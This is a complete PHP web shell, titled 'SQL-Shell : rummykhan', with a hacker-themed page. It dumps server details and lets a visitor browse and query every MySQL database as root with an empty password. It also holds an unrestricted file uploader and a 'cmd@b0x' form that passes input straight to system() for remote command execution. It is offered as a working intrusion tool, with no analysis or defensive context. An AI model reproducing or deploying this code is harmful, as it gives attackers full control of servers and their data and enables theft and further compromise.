SQL Shell

<head>
<title>SQL-Shell : rummykhan </title>
<style type="text/css">
    .main{
        color:white;
        background-color: black;
        background-image: url(http://s29.postimg.org/isfa5pn8n/Anonymous_1680x1050.jpg);
    }
    .heading{
        color:green;
        font-weight: bold;
    }
    .pad{
        padding: 5px;
    }
</style>
</head>
<body class="main">
<?php echo '<span class="heading">Server : </span>'.php_uname(); ?>
<br>
<br>
<center>
    <form method="GET" action="">
    <table>
    <tr>
        <td><span class="heading">Query :</span></td>
        <td><textarea name="usrquery" rows="5" cols="40" ><?php if(isset($_GET['usrquery'])){echo $_GET['usrquery'];} ?></textarea></td>
    </tr>
    <tr>
        <td></td>
        <td><input type="submit" name="runquery" value="Submit"></td>
    </tr>
    </table>
    </form>
<?php
error_reporting(0);

function querydb($query){
    $counter = 0;
    $result = mysql_query($query) or die(mysql_error());
    echo '<table border="1" width="35%">';
    while($row = mysql_fetch_array($result)){
        $counter++;
        echo '<tr>';
        echo '<td class="pad">'.$counter.'</td>';

        for ($i=0; $i < count($row); $i++) {
            if(isset($row[$i])){
                echo '<td class="pad">'.$row[$i].'</td>';
            }
        }
        echo '</tr>';
    }
    $counter=0;
    echo '</table>';
}

$user = 'root';
$pass = '';
$host = 'localhost';

$db = $_GET['db'];
$table = $_GET['tbl'];
$usrquery = $_GET['usrquery'];

if(mysql_connect($host,$user,$pass)){
    if(isset($usrquery)){
        mysql_select_db($_COOKIE['db']);
        if (strpos($usrquery, 'INSERT')!==false || strpos($usrquery, 'UPDATE')!==false) {
            if(mysql_query($usrquery)){
                echo 'Query Success<br>';
            }else{
                die(mysql_error());
            }
        }elseif (strpos($usrquery, 'SELECT')!==false || strpos($usrquery, 'select')!==false) {
            echo '<span class="heading">Your Query Output : </span><br>';
            querydb($usrquery);
        }
    }
    if($db==''){
        echo '<span class="heading">DBs : </span><br>';
        querydb('SELECT schema_name FROM information_schema.schemata');
    }else{
        setcookie('db',$db);
        if(isset($table) && isset($db)){
            echo '<span class="heading">Columns : </span><br>';
            querydb("SELECT column_name FROM information_schema.columns WHERE table_schema='".$db."' AND table_name = '".$table."'");
            echo '<span class="heading">Data : </span><br>';
            querydb("SELECT * FROM ".$db.".".$table);
        }else{
            echo '<span class="heading">Tables : </span><br>';
            querydb("SELECT table_name FROM information_schema.tables where table_schema='".$db."'");
        }
    }
}else{
    die(mysql_error());
}


//Uploader Code
echo '<br>';
if($_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Upload !!!</b><br><br>"; }}

?>
<html><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file"><input name="_upl" type="submit" id="_upl" value="Upload"></form></html>
<form method="POST" action="">
    <span class="heading">cmd@b0x : </span>
    <input type="text" name="system" value="<?php if(isset($_POST['system'])){echo $_POST['system'];}?>">
    <input type="submit" name="execute" value="Execute">
</form>
<span class="heading">
<?php

if(isset($_POST['execute'])){
    if(!empty($_POST['system'])){
        system($_POST['system']);
    }
}
?>
</span>
</center>
</body>